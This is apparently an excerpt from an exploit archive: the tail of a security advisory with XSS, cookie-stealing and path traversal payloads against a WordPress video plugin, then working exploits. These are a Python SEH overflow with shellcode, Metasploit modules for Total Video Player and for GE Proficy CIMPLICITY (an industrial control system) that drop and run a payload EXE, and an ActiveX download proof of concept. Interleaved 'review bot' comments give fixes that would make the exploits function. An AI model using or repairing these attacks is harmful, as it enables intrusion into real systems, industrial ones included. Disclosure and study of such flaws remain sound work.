/ls/videotext.php?n=%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/sc
ript%3E
2.4 The vulnerability exists due to insufficient filtration of "message" HTTP GET parameter passed to "/wp-content/plugins/videowhisper-live-streaming-integration/ls/lb_logou
t.php" script. A remote attacker can trick a user to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.
The exploitation example below uses the "alert()" JavaScript function to display "immuniweb" word:
http://[host]/wp-content/plugins/videowhisper-live-streaming-integration
/ls/lb_logout.php?message=%3C/title%3E%3Cscript%3Ealert('immuniweb')%3C/
script%3E
2.5 The vulnerability exists due to insufficient filtration of "ct" HTTP POST parameter passed to "/wp-content/plugins/videowhisper-live-streaming-integration/ls/lb_statu
s.php" script. A remote attacker can trick a logged-in user to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.
The exploitation example below uses the "alert()" JavaScript function to display "immuniweb" word:
<body onLoad="document.hack.submit()">
<form name="hack" action="http://[host]/wp-content/plugins/videowhisper-live-streaming-int
egration/ls/lb_status.php" method="post">
<input type="hidden" name="s" value="1">
<input type="hidden" name="r" value="1">
<input type="hidden" name="ct" value="<script>alert('immuniweb')</script>">
</form>
</body>
2.6 The vulnerability exists due to insufficient filtration of "ct" HTTP POST parameter passed to "/wp-content/plugins/videowhisper-live-streaming-integration/ls/v_status
.php" script. A remote attacker can trick a user to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.
The exploitation example below uses the "alert()" JavaScript function to display "immuniweb" word:
<body onLoad="document.hack.submit()">
<form name="hack" action="http://[host]/wp-content/plugins/videowhisper-live-streaming-int
egration/ls/v_status.php" method="post">
<input type="hidden" name="s" value="1">
<input type="hidden" name="r" value="1">
<input type="hidden" name="ct" value="<script>alert('immuniweb')</script>">
</form>
</body>
3) Path Traversal in VideoWhisper Live Streaming Integration: CVE-2014-1907
3.1 The vulnerability exists due to insufficient filtration of "s" HTTP GET parameter in "/wp-content/plugins/videowhisper-live-streaming-integration/ls/rtmp_log
in.php" script. A remote attacker can view contents of arbitrary files on the target system using directory traversal sequences.
The exploitation example below displays contents of "/etc/passwd" file:
http://[host]/wp-content/plugins/videowhisper-live-streaming-integration
/ls/rtmp_login.php?s=../../../../../../etc/passwd
3.2 The vulnerability exists due to insufficient filtration of "s" HTTP GET parameter in "/wp-content/plugins/videowhisper-live-streaming-integration/ls/rtmp_log
out.php" script. A remote attacker can delete arbitrary files on the target system using directory traversal sequences.
The exploitation example below deletes a file "/tmp/immuniweb":
http://[host]/wp-content/plugins/videowhisper-live-streaming-integration
/ls/rtmp_logout.php?s=../../../../../../../../tmp/immuniweb
Successful exploitation of this vulnerability requires that file "/tmp/immuniweb" exists on the system.
4) Information Exposure Through Externally-generated Error Message in VideoWhisper Live Streaming Integration: CVE-2014-1908
4.1 The vulnerability exists due to improper implementation of error handling mechanisms in multiple scripts. A remote attacker can send a specially crafted HTTP GET request to vulnerable scripts and gain knowledge of full installation path of the application.
The following URL can be used to gain knowledge of full installation path of the application:
http://[host]/wp-content/plugins/videowhisper-live-streaming-integration
/bp.php
http://[host]/wp-content/plugins/videowhisper-live-streaming-integration
/videowhisper_streaming.php
http://[host]/wp-content/plugins/videowhisper-live-streaming-integration
/ls/rtmp.inc.php
------------------------------------------------------------------------
-----------------------
Solution:
Update to VideoWhisper Live Streaming Integration version 4.29.5
------------------------------------------------------------------------
-----------------------
References:
[1] High-Tech Bridge Advisory HTB23089 - https://www.htbridge.com/advisory/HTB23089 - Multiple Vulnerabilities in VideoWhisper Live Streaming Integration Plugin for WordPress.
[2] VideoWhisper Live Streaming Integration - http://wordpress.org/plugins/videowhisper-live-streaming-integration/ - The VideoWhisper Live Streaming software can easily be used to add video broadcasting features to WordPress sites and live video streams on blog pages.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[5] ImmuniWeb® - http://www.htbridge.com/immuniweb/ - is High-Tech Bridge's proprietary web application security assessment solution with SaaS delivery model that combines manual and automated vulnerability testing.
------------------------------------------------------------------------
-----------------------
Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.
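Review bot: the videotext.php PoC in section 2.3 (the `?n=` URL ending in `alert(document.cookie)`) contradicts the sentence introducing the four examples, which says each one displays the word "immuniweb"; either change that payload to `alert('immuniweb')` like the other three or adjust the lead-in, since a reader copying the set otherwise gets a cookie-disclosure payload where a harmless marker was promised. Section 2.2 also announces "exploitation examples" but gives a single auto-submitting form. In section 4.1 the text speaks of a "specially crafted HTTP GET request", yet the three URLs listed are plain requests for bp.php, videowhisper_streaming.php and ls/rtmp.inc.php with no parameters; state what actually triggers the path-disclosing error so a tester can confirm the finding rather than guess.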

View file

@ -0,0 +1,33 @@
#!/usr/bin/python
# coding: utf-8
#Exploit Title: GoldMP4Player Buffer Overflow (SEH)
#Software Link: http://download.cnet.com/GoldMP4Player/3000-2139_4-10967424.html
#Version: 3.3
#Date: 27.02.2014
#Tested on: Windows Win 7 En
# Howto / Notes:
#open the URL in filename via File -> Open Flash URL\n";
#-------------------------------------------------------
'''Credits:
Vulnerability POC identified in v3.3 by Gabor Seljan
http://www.exploit-db.com/exploits/31914/'''
#------------------------------------------------------
head="http://"
buff="\x41" * 253
#shell calc.exe
buff+=("ëÿÿœ¼‰áÛÖÙqôZJJJJJJJJJJJCCCCCC7RYjAXP0A0AkAAQ2AB2BB0BBABXP8"
"ABuJIylHhlIePePGpapMYJEFQiBBDlKpRVPnk3btLNkv24TlKrRDhdOMgBj7Vtq9oTq9PllUlpac"
"LdBFLa09QHO4M31kwjBL01BpWLKpRvpNk3rElFaZpnk1PBXou9PQdPJvajpbplKrhR8NkpXa0wqI"
"CIsgLqYlKp4nkgqKfEakOVQIPllzaHOtMuQxGGHYpsEJTVcSMYh5kqm141ehbchNkshtdWqYC0fLK"
"fl2klKrx5LWqxSlKgtlKuQxPmYstEtEtsksku10YcjpQkOypf8QOpZLKeBhkk6QMSZ31nmouMiGpEP"
"s0f02HdqlKpoLGkOjuOKjPOEI2QFCXi6NuoMomkOju5ls6SL6jOpkKYpsE4EOKBgdSd20orJWppSio"
"IERCParLbCDnbEsH0e30AA")
head2=".swf"
exploit=head + buff + head2
try:
out_file = open("exploit.txt",'w')
out_file.write(exploit)
out_file.close()
except:
print "Error"
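Review bot: the `buff+=(...)` block embeds the leading non-alphanumeric bytes of the shellcode as literal characters (`ëÿÿœ¼‰áÛÖÙqô`) in a source file declared `# coding: utf-8`, so each of them is stored as a multi-byte UTF-8 sequence instead of the single byte the decoder stub needs, and `open("exploit.txt",'w')` then writes those bytes in text mode; write the stub with `\x..` escapes, as the `"\x41" * 253` padding already is, and open the file with `'wb'`. The title says "(SEH)" but the script shows no nSEH/SEH values, only 253 bytes of padding followed directly by the payload, so a reader cannot tell where the handler is overwritten or which address is used; spell them out as separate variables. Minor: the `\n";` at the end of the `#open the URL in filename` comment is leftover from another template, and `except: print "Error"` swallows the actual exception.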

View file

@ -0,0 +1,73 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::FILEFORMAT
include Msf::Exploit::Seh
def initialize(info = {})
super(update_info(info,
'Name' => 'Total Video Player 1.3.1 (Settings.ini) - SEH Buffer Overflow',
'Description' => %q{
This module exploits a buffer overflow in Total Video Player 1.3.1. The vulnerability
occurs opening malformed Settings.ini file e.g."C:\Program Files\Total Video Player\".
This module has been tested successfully over Windows WinXp-Sp3-EN, Windows 7, Windows 8.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Mike Czumak', # (T_v3rn1x) -- @SecuritySift
'Fr330wn4g3 <Fr330wn4g3[at]gmail.com>' # Metasploit module
],
'References' =>
[
[ 'OSVDB', '100619' ],
[ 'EDB', '29799' ]
],
'DefaultOptions' =>
{
'ExitFunction' => 'process',
},
'Platform' => 'win',
'Payload' =>
{
'BadChars' => "\x00\x0a\x0d\xff",
'Space' => 1787,
'DisableNops' => true,
},
'Targets' =>
[
[ 'Windows Universal',
{
'Ret' => 0x10012848, # pop ebx # pop ecx # ret - hskin.dll
'Offset' => 256
}
],
],
'Privileged' => false,
'DisclosureDate' => 'Nov 24 2013',
'DefaultTarget' => 0))
register_options([OptString.new('FILENAME', [ false, 'The file name.', 'Settings.ini']),], self.class)
end
def exploit
buffer = "[Support Groups]\r\nVideo="
buffer << rand_text(target['Offset'])
buffer << generate_seh_payload(target.ret)
buffer << payload.encoded
buffer << "\r\n[AssociateType]\r\nAssociateType =1"
file_create(buffer)
end
end
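Review bot: in `exploit`, `generate_seh_payload(target.ret)` from `Msf::Exploit::Seh` already appends `payload.encoded` after the nSEH/SEH record, so the following `buffer << payload.encoded` writes the payload a second time; either drop that line or call `generate_seh_record(target.ret)` if only the record is wanted, and re-check `'Space' => 1787` against the room that is actually left after the record. The description's "occurs opening malformed Settings.ini file e.g."C:\Program Files\Total Video Player\"" should read "occurs when opening a malformed Settings.ini file from the installation directory, e.g. C:\Program Files\Total Video Player\", and "Windows WinXp-Sp3-EN" is redundant.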

View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/29963/info
UUSee is prone to a vulnerability that can cause malicious files to be downloaded and saved to arbitrary locations on an affected computer.
Attackers may exploit this issue to overwrite sensitive files with malicious data that will compromise the affected computer. Other attacks are possible.
UUSee 2008 is vulnerable; other versions may also be affected.
<html> <object classid='clsid:2CACD7BB-1C59-4BBB-8E81-6E83F82C813B' id='target'></object> <script language='vbscript'> arg1="\Program Files\Common Files\uusee\" arg2="http://www.example.com/UU.ini" arg3="http://www.example2.com/mini3/uusee_client_update/remark.php" arg4=1 target.Update arg1 ,arg2 ,arg3 ,arg4 </script> </html>
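Review bot: the PoC is laid out as one line, so the VBScript statements from `arg1="\Program Files\Common Files\uusee\"` through `target.Update arg1 ,arg2 ,arg3 ,arg4` run together without line breaks or `:` separators and will not parse; put each statement on its own line. Since `arg1` names the destination directory and `arg2` the file fetched from the attacker-controlled URL, the write target should be spelled out in the description rather than left as "arbitrary locations", and the entry should say whether the `2CACD7BB-1C59-4BBB-8E81-6E83F82C813B` control is marked safe for scripting, which governs whether Internet Explorer lets a page call `Update` without prompting.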

315
platforms/windows/remote/31987.rb Executable file
View file

@ -0,0 +1,315 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Auxiliary::Report
include Msf::Exploit::EXE
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::HttpServer::HTML
def initialize
super(
'Name' => 'GE Proficy CIMPLICITY gefebt.exe Remote Code Execution',
'Description' => %q{
This module abuses the gefebt.exe component in GE Proficy CIMPLICITY, reachable through the
CIMPLICIY CimWebServer. The vulnerable component allows to execute remote BCL files in
shared resources. An attacker can abuse this behaviour to execute a malicious BCL and
drop an arbitrary EXE. The last one can be executed remotely through the WebView server.
This module has been tested successfully in GE Proficy CIMPLICITY 7.5 with the embedded
CimWebServer. This module starts a WebDAV server to provide the malicious BCL files. When
the target hasn't the WebClient service enabled, an external SMB service is necessary.
},
'Author' => [
'amisto0x07', # Vulnerability discovery
'Z0mb1E', # Vulnerability discovery
'juan vazquez' # Metasploit module
],
'References' =>
[
[ 'CVE', '2014-0750'],
[ 'ZDI', '14-015' ],
[ 'URL', 'http://ics-cert.us-cert.gov/advisories/ICSA-14-023-01' ]
],
'Stance' => Msf::Exploit::Stance::Aggressive,
'Platform' => 'win',
'Targets' =>
[
[ 'GE Proficy CIMPLICITY 7.5 (embedded CimWebServer)', { } ]
],
'DefaultTarget' => 0,
'Privileged' => true,
'DisclosureDate' => 'Jan 23 2014'
)
register_options(
[
Opt::RPORT(80),
OptString.new('URIPATH', [ true, 'The URI to use (do not change)', '/' ]),
OptPort.new('SRVPORT', [ true, 'The daemon port to listen on (do not change)', 80 ]),
OptString.new('UNCPATH', [ false, 'Override the UNC path to use.' ]),
OptBool.new('ONLYMAKE', [ false, 'Just generate the malicious BCL files for using with an external SMB server.', true ]),
OptString.new('TARGETURI', [true, 'The base path to the CimWeb', '/'])
], self.class)
end
def on_request_uri(cli, request)
case request.method
when 'OPTIONS'
process_options(cli, request)
when 'PROPFIND'
process_propfind(cli, request)
when 'GET'
process_get(cli, request)
else
vprint_status("#{request.method} => 404 (#{request.uri})")
resp = create_response(404, "Not Found")
resp.body = ""
resp['Content-Type'] = 'text/html'
cli.send_response(resp)
end
end
def process_get(cli, request)
if request.uri =~ /#{@basename}(\d)\.bcl/
print_status("GET => Payload")
data = @bcls[$1.to_i]
send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })
return
end
# Anything else is probably a request for a data file...
vprint_status("GET => DATA (#{request.uri})")
data = rand_text_alpha(8 + rand(10))
send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })
end
#
# OPTIONS requests sent by the WebDav Mini-Redirector
#
def process_options(cli, request)
vprint_status("OPTIONS #{request.uri}")
headers = {
'MS-Author-Via' => 'DAV',
'DASL' => '<DAV:sql>',
'DAV' => '1, 2',
'Allow' => 'OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH',
'Public' => 'OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK',
'Cache-Control' => 'private'
}
resp = create_response(207, "Multi-Status")
headers.each_pair {|k,v| resp[k] = v }
resp.body = ""
resp['Content-Type'] = 'text/xml'
cli.send_response(resp)
end
#
# PROPFIND requests sent by the WebDav Mini-Redirector
#
def process_propfind(cli, request)
path = request.uri
print_status("Received WebDAV PROPFIND request")
body = ''
if (path =~ /\.bcl$/i)
print_status("Sending BCL multistatus for #{path} ...")
body = %Q|<?xml version="1.0"?>
<a:multistatus xmlns:b="urn:uuid:c2f41010-65b3-11d1-a29f-00aa00c14882/" xmlns:c="xml:" xmlns:a="DAV:">
<a:response>
</a:response>
</a:multistatus>
|
elsif (path =~ /\/$/) or (not path.sub('/', '').index('/'))
# Response for anything else (generally just /)
print_status("Sending directory multistatus for #{path} ...")
body = %Q|<?xml version="1.0" encoding="utf-8"?>
<D:multistatus xmlns:D="DAV:">
<D:response xmlns:lp1="DAV:" xmlns:lp2="http://apache.org/dav/props/">
<D:href>#{path}</D:href>
<D:propstat>
<D:prop>
<lp1:resourcetype><D:collection/></lp1:resourcetype>
<lp1:creationdate>2010-02-26T17:07:12Z</lp1:creationdate>
<lp1:getlastmodified>Fri, 26 Feb 2010 17:07:12 GMT</lp1:getlastmodified>
<lp1:getetag>"39e0001-1000-4808c3ec95000"</lp1:getetag>
<D:lockdiscovery/>
<D:getcontenttype>httpd/unix-directory</D:getcontenttype>
</D:prop>
<D:status>HTTP/1.1 200 OK</D:status>
</D:propstat>
</D:response>
</D:multistatus>
|
else
print_status("Sending 404 for #{path} ...")
send_not_found(cli)
return
end
# send the response
resp = create_response(207, "Multi-Status")
resp.body = body
resp['Content-Type'] = 'text/xml'
cli.send_response(resp)
end
def check
uri = normalize_uri(target_uri.to_s, "CimWeb", "gefebt.exe")
uri << "?"
res = send_request_cgi('uri' => uri)
# res.to_s is used because the CIMPLICITY embedded web server
# doesn't send HTTP compatible responses.
if res and res.code == 200 and res.to_s =~ /Usage.*gefebt\.exe/
return Exploit::CheckCode::Detected
end
Exploit::CheckCode::Unknown
end
def exploit
@extensions = "bcl"
@bcls= []
@total_exe = 0
setup_resources
make_bcls
print_status("BCL's available at #{@exploit_unc}#{@share_name}\\#{@basename}{i}.bcl")
unless datastore['UNCPATH'].blank?
@bcls.each_index { |i| file_create("#{@basename}#{i}.bcl", @bcls[i]) }
if datastore['ONLYMAKE']
print_warning("Files created, remember to upload the BCL files to the remote share!")
print_warning("Once ready set ONLYMAKE to false")
else
exploit_bcl
end
return
end
super
end
def setup_resources
if datastore['UNCPATH'].blank?
# Using WebDAV
my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address('50.50.50.50') : datastore['SRVHOST']
@basename = rand_text_alpha(3)
@share_name = rand_text_alpha(3)
@exploit_unc = "\\\\#{my_host}\\"
@exe_filename = "#{rand_text_alpha(3 + rand(4))}.exe"
unless datastore['SRVPORT'].to_i == 80 && datastore['URIPATH'] == '/'
fail_with(Failure::BadConfig, 'Using WebDAV requires SRVPORT=80 and URIPATH=/')
end
else
# Using external SMB Server
if datastore['UNCPATH'] =~ /(\\\\[^\\]*\\)([^\\]*)\\([^\\]*)\.bcl/
@exploit_unc = $1
@share_name = $2
@basename = $3
# Use an static file name for the EXE since the module doesn't
# deliver the BCL files in this case.
@exe_filename = "ge_pld.exe"
else
fail_with(Failure::BadConfig, 'Bad UNCPATH format, should be \\\\host\\shared_folder\\base_name.blc')
end
end
end
def make_bcls
exe = generate_payload_exe
# Padding to be sure we're aligned to 4 bytes.
exe << "\x00" until exe.length % 4 == 0
longs = exe.unpack("l*")
offset = 0
# gefebt.exe isn't able to handle (on my test environment) long
# arrays bigger than 16000, so we need to split it.
while longs.length > 0
parts = longs.slice!(0, 16000)
@bcls << generate_bcl(parts , offset)
offset += parts.length * 4
end
end
def generate_bcl(slices, offset)
bcl_payload = ""
slices.each_index do |i|
bcl_payload << "s(#{i + 1}) = #{slices[i]}\n"
end
<<-EOF
Option CStrings On
Sub Main()
Open "#{@exe_filename}" For Binary Access Write As #1
Dim s(#{slices.length}) As Long
#{bcl_payload}
For x = 1 To #{slices.length}
t = x - 1
Put #1,t*4+1+#{offset},s(x)
Next x
Close
End Sub
EOF
end
def execute_bcl(i)
print_status("#{peer} - Executing BCL code #{@basename}#{i}.bcl to drop final payload...")
uri = normalize_uri(target_uri.to_s, "CimWeb", "gefebt.exe")
uri << "?#{@exploit_unc}#{@share_name}\\#{@basename}#{i}.bcl"
res = send_request_cgi('uri' => uri)
# We use res.to_s because the embedded CIMPLICITY Web server doesn't
# answer with valid HTTP responses.
if res and res.code == 200 and res.to_s =~ /(^Error.*$)/
print_error("#{peer} - Server answered with error: $1")
fail_with(Failure::Unknown, "#{peer} - Server answered with error")
elsif res and res.code == 200 and res.to_s =~ /No such file or directory/
fail_with(Failure::BadConfig, "#{peer} - The target wasn't able to access the remote BCL file")
elsif res and res.code == 200
print_good("#{peer} - Answer has been successful")
else
fail_with(Failure::Unknown, "#{peer} - Unknown error")
end
end
def exploit_bcl
@bcls.each_index do |i|
execute_bcl(i)
end
print_status("#{peer} - Executing #{@exe_filename}...")
uri = normalize_uri(target_uri.to_s, "CimWeb", @exe_filename)
uri << "?"
# Enough timeout to execute the payload, but don't block the exploit
# until there is an answer.
send_request_cgi({'uri' => uri}, 3)
end
def primer
exploit_bcl
service.stop
end
def file_create(fname, data)
ltype = "exploit.fileformat.#{self.shortname}"
full_path = store_local(ltype, nil, data, fname)
print_good("#{fname} stored at #{full_path}")
end
end
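Review bot: in `execute_bcl`, `print_error("#{peer} - Server answered with error: $1")` prints the literal text `$1`, because Ruby does not interpolate a global inside a double-quoted string without `#{}`; use `#{$1}` (or capture the match into a local first) so the server's error text reaches the operator before `fail_with` aborts. The `fail_with` message in `setup_resources` says UNCPATH should end in `base_name.blc` while the regex just above it requires `.bcl`; fix the typo so the operator is told the format the code accepts. Also `http//metasploit.com/download` in the header comment is missing its colon, "CIMPLICIY" in the description should be "CIMPLICITY", and `@total_exe = 0` is set in `exploit` but never read.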